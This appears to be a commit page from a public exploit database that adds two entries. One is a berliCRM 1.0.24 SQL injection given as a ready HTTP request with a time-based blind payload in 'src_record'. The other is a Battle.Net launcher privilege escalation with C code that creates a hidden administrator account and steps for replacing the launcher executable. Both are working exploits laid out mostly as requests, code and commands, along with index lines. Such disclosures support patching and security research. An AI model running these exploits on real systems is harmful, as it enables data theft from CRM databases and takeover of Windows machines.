DB: 2020-10-14

2 changes to exploits/shellcodes Battle.Net 1.27.1.12428 - Insecure File Permissions berliCRM 1.0.24 - 'src_record' SQL Injection
hardCTE · Oct 14, 2020 · 973a669 · 973a669
1 parent 14fcd48
commit 973a669
Show file tree

Hide file tree

Showing 3 changed files with 136 additions and 0 deletions.
diff --git a/exploits/php/webapps/48872.txt b/exploits/php/webapps/48872.txt
@@ -0,0 +1,35 @@
+# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection
+# Google Dork: N/A
+# Date: 2020-10-11
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.berlicrm.de
+# Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip
+# Version: 1.0.24
+# Tested on: Kali Linux
+# CVE : N/A
+
+
+========== Post Request =========================
+
+POST /index.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Referer: localhost
+Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 226
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
+Connection: Keep-alive
+
+__vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup
+
+============= Vulnerable Parameter ===============
+
+src_record (POST)
+
+============= Payload  ===========================
+
+0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
diff --git a/exploits/windows/local/48873.txt b/exploits/windows/local/48873.txt
@@ -0,0 +1,99 @@
+# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions
+# Date: 2020-10-09
+# Exploit Author: George Tsimpidas
+# Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop )
+# Version Patch: 1.27.1.12428
+# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
+# Category: local
+
+
+
+Vulnerability Description:
+
+Battle.Net Launcher (Battle.net.exe) suffers from an elevation of
+privileges
+vulnerability which can be used by a simple user that can change the
+executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions,
+with the 'F' flag (Full) for 'Users' group, making the entire directory
+'Battle.net' and its files and sub-dirs world-writable.
+
+## Insecure Folder Permission
+
+C:\Program Files (x86)>icacls Battle.net
+
+Battle.net BUILTIN\Users:(OI)(CI)(F)
+BUILTIN\Administrators:(OI)(CI)(F)
+CREATOR OWNER:(OI)(CI)(F)
+
+## Insecure File Permission
+
+C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe"
+
+Battle.net.exe BUILTIN\Users:(I)(F)
+BUILTIN\Administrators:(I)(F)
+FREY-OMEN\30698:(I)(F)
+
+
+## Local Privilege Escalation Proof of Concept
+#0. Download & install
+
+#1. Create low privileged user & change to the user
+## As admin
+
+C:\>net user lowpriv Password123! /add
+C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name lowpriv
+Local Group Memberships *Users
+Global Group memberships *None
+
+#2. Move the Service EXE to a new name
+
+C:\Program Files (x86)\Battle.net> whoami
+
+lowpriv
+
+C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe
+1 file(s) moved.
+
+#3. Create malicious binary on kali linux
+
+## Add Admin User C Code
+kali# cat addAdmin.c
+int main(void){
+system("net user placebo mypassword /add");
+system("net localgroup Administrators placebo /add");
+WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0);
+return 0;
+}
+
+## Compile Code
+kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe
+
+#4. Transfer created 'Battle.net.exe' to the Windows Host
+
+#5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files
+(x86)\Battle.net>' Folder
+
+C:\Program Files (x86)\Battle.net> move
+C:\Users\lowpriv\Downloads\Battle.net.exe .
+
+#6. Check that exploit admin user doesn't exists
+
+C:\Program Files (x86)\Battle.net> net user placebo
+
+The user name could not be found
+
+#6. Reboot the Computer
+
+C:\Program Files (x86)\Battle.net> shutdown /r
+
+#7. Login & look at that new Admin
+
+C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
+/v "Full"
+
+User name placebo
+Local Group Memberships *Administrators *Users
+Global Group memberships *None
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -10387,6 +10387,7 @@ id,file,description,date,author,type,platform,port
 48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,
 48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
+48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40690,6 +40691,7 @@ id,file,description,date,author,type,platform,port
 48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple,
 48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
 48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
+48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,